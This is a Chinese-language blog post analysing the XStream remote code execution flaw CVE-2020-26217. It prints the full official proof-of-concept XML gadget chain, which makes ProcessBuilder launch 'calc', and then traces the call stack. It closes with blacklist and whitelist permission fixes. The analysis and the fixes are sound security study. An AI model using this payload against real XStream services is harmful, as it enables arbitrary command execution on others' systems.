• Xstream远程代码执行(CVE-2020-26217)复现分析


    前言

    Xstream是一个基于java语言的xml操作类库,同时也是Java对象和XML相互转换的工具,提供了所有的基础类型、数组、集合等类型直接转换的支持。因此XML常用于数据交换、对象序列化。本文将从Xstream的环境搭建到CVE-2020-26217远程代码执行漏洞的复现分析做一个记录。

    环境准备

    本地环境:idea+jdk8.0

    idea新建一个maven项目

    在pom.xml文件中添加如下依赖

    接着右键maven->Reimport下载导入Xstream1.4.13

    新建一个demo类来方便调试

    import com.thoughtworks.xstream.XStream;
    
    public class XstreamDemo {
        public static void main(String[] args){
            String xml = "<map>poc</map>";
            XStream xstream = new XStream();
            xstream.fromXML(xml);
        }
    }
    

    复现分析

    在Xstream的官网已经发布了官方的poc,链接:https://x-stream.github.io/CVE-2020-26217.html

    内容如下:

    <map>
      <entry>
        <jdk.nashorn.internal.objects.NativeString>
          <flags>0</flags>
          <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
            <dataHandler>
              <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
                <contentType>text/plain</contentType>
                <is class='java.io.SequenceInputStream'>
                  <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
                    <iterator class='javax.imageio.spi.FilterIterator'>
                      <iter class='java.util.ArrayList$Itr'>
                        <cursor>0</cursor>
                        <lastRet>-1</lastRet>
                        <expectedModCount>1</expectedModCount>
                        <outer-class>
                          <java.lang.ProcessBuilder>
                            <command>
                              <string>calc</string>
                            </command>
                          </java.lang.ProcessBuilder>
                        </outer-class>
                      </iter>
                      <filter class='javax.imageio.ImageIO$ContainsFilter'>
                        <method>
                          <class>java.lang.ProcessBuilder</class>
                          <name>start</name>
                          <parameter-types/>
                        </method>
                        <name>start</name>
                      </filter>
                      <next/>
                    </iterator>
                    <type>KEYS</type>
                  </e>
                  <in class='java.io.ByteArrayInputStream'>
                    <buf></buf>
                    <pos>0</pos>
                    <mark>0</mark>
                    <count>0</count>
                  </in>
                </is>
                <consumed>false</consumed>
              </dataSource>
              <transferFlavors/>
            </dataHandler>
            <dataLen>0</dataLen>
          </value>
        </jdk.nashorn.internal.objects.NativeString>
        <string>test</string>
      </entry>
    </map>
    

    把这段poc替换进我们新建的demo类中的xml,运行后成功弹出了计算器

    首先为了观察整个gadget的调用栈,在poc中可以看出,最后一步会运行到java.lang.ProcessBuilder#start方法,所以直接来到这里下断点调试

    发现调用栈还是很长的,下面一点一点来跟着poc和调用栈分析

    先回到最开始的入口来

    先把我们的poc作为xml参数传入fromXML方法,后面接着又调用了XStream#unmarshal()方法,参数为处理后的poc字符输入流

    跟入XStream#unmarshal()方法,后面又调用了AbstractTreeMarshallingStrategy#unmarshal()

    后面调用了start(),接着跟入

    接着开始进入到convertAnother()方法,也就是xml到java类对象的一系列转换

    经过了几个convert转换后,接着调用了MapConvert#unmarshal()方法,先是实例化生成了一个map对象,然后又调用populateMap()把数据封装到map对象里

    跟入putCurrentEntryIntoMap()方法

    这里开始调用了hashmap#put()方法

    这里的key也就是我们构造的entry类实例对象,查看其属性,可以发现跟我们的POC是逐一对应的

    后面就是相继调用了hashmap#hash()方法和 NativeString#hashcode()方法

    跟入getStringValue()方法,这里的value值是Base64Data类实例化对象,所以接着就调用了Base64Data#toString()方法

    跟入Base64Data#toString()后发现又调用了Base64Data#get()方法,跟着直接查看Base64Data#get()方法

    跟踪this.dataHandler这个变量值,可以看到this.dataHandler.getDataSource().getInputStream()获取的就是SequenceInputStream类的实例对象,并以此为参数传入了ByteArrayOutputStreamEx#readForm()方法

    跟入ByteArrayOutputStreamEx#readForm(),这里的is也就是SequenceInputStream类,所以后面也就是调用了SequenceInputStream#read()方法

    在SequenceInputStream#read()方法去读取inputstream对象全部内容的过程中,就会调用nextStream()方法遍历其中所有数据

    进入到SequenceInputStream#nextStream()方法后,会先循环调用每个Enumeration的nextElement()方法,然后在Enumeration的nextElement()方法中会去遍历整个迭代器iterator,从而去调用到ServiceRegistry注册服务类的next()方法

    再跟进ServiceRegistry#advance()方法,首先先判断迭代器的下一个对象是否为空,即调用hasNext()方法,不为空则返回true并进入while循环取出对象;而这里的iter是我们预先构建好的迭代器,返回生成对象elt是processBuilder类,接着在后面的filter也是我们构造的ImageIO类中的一个ContainsFilter内部类,接下来于是也就调用了ImageIO$ContainsFilter#filter()方法

    在调试栏中我们查看该ImageIO$ContainsFilter这个内部类里对应的属性可以看出其实也就是我们poc所构造好的

    最后再跟入ImageIO$ContainsFilter#filter()方法,终于在这里实现了反射调用到了ProcessBuilder类的start()方法,另外所需的参数也包含ImageIO$ContainsFilter这个内部类中,而这个类所创建的对象也是可控的,也就是说所需的参数均可控,从而导致了这次的代码执行漏洞。

    这就是这整个调用栈的运行处理过程了,所以这个漏洞总的来说就是因为用户可以构造xml的恶意输入,让Xstream在处理反序列化的时候生成了恶意的对象类ContainsFilter,并通过ImageIO$ContainsFilter#filter()这个gadget去反射调用任意构造好的类方法,比如poc里的processBuilder类的start()方法去启动一个calc计算器的进程,从而导致了代码执行漏洞。

    修复方案

    我们知道了漏洞的根本原因就是恶意xml输入可以构造出恶意的对象,那么最简单粗暴的方法的就是将这次gadget的关键类拉入黑名单,不过这样的修复方式往往都是治标不治本,最理想的修复方式就是通过白名单的方式明确控制反序列化对象的类名,不过考虑到一些业务的复杂度,可能白名单是理想但又不够合适的方式,下面两种实现方式都介绍一下:

    1.黑名单方式(简单粗暴)

    XStream xstream = new XStream();
    // 首先清除默认设置,然后进行自定义设置
    xstream.addPermission(NoTypePermission.NONE);
    //将ImageIO类加入黑名单
    xstream.denyPermission(new ExplicitTypePermission(new Class[]{ImageIO.class}));
    xstream.fromXML(xml);
    

    2.白名单方式(推荐)

    XStream xstream = new XStream();
    // 首先清除默认设置,然后进行自定义设置
    xstream.addPermission(NoTypePermission.NONE);
    // 添加一些基础的类型,如Array、NULL、primitive
    xstream.addPermission(ArrayTypePermission.ARRAYS);
    xstream.addPermission(NullPermission.NULL);
    xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
    // 添加自定义的类列表
    stream.addPermission(new ExplicitTypePermission(new Class[]{Date.class}));
    

    Reference

    https://xz.aliyun.com/t/8526

    https://github.com/Cryin/Paper/blob/master/Xstream%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D%E6%96%B9%E6%A1%88.md

    乐观的悲观主义者。
  • 相关阅读:
    jQuery $.each用法
    关于jQuery中的attr和data问题
    AngularJS入门基础PPT(附下载链接)
    依赖注入 | Dependency Injection
    ng事件中为变量的参数
    angularjs factory,service,provider 自定义服务的不同
    $digest already in progress
    理解Angular中的$apply()以及$digest()
    LeetCode 最长连续递增序列
    LeetCode 岛屿的最大面积
  • 原文地址:https://www.cnblogs.com/v1ntlyn/p/14034019.html
Copyright © 2020-2023  润新知